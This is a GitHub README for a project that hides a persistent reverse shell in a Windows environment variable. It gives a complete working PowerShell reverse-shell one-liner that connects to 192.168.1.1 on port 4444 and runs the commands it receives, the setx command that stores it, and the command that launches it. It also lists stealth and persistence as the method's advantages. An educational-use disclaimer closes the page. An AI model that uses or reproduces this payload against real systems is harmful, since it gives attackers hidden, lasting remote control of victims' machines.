Skip to content

Latest commit

 

History

History
38 lines (21 loc) · 1.73 KB

README.md

File metadata and controls

38 lines (21 loc) · 1.73 KB

Reverse Shell Persistence with Windows Environment Variables

Overview

This project demonstrates how to create a persistent reverse shell using Windows environment variables. By storing the reverse shell payload in an environment variable, you can stealthily execute it across multiple sessions.

Usage

  1. Set the Reverse Shell in the Environment Variable
setx REV_SHELL "$client = New-Object Net.Sockets.TcpClient('192.168.1.1',4444); if ($client.Connected) { $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = ([Text.Encoding]::ASCII).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([Text.Encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush() } $client.Close() }"```
  1. Execute the Reverse Shell
powershell.exe -Command "%REV_SHELL%"

Why Use This Method?

  • Stealth: Hides the reverse shell in environment variables.
  • Persistence: The shell remains across sessions and reboots.
  • Convenience: Easy to execute when needed.

POC

image

image

Disclaimer

This project is intended for educational purposes only. It demonstrates a reverse shell technique using Windows environment variables for cybersecurity professionals and ethical hackers to understand potential attack vectors. Do not use this method for illegal or unauthorized activities. Always obtain proper authorization before conducting any security testing.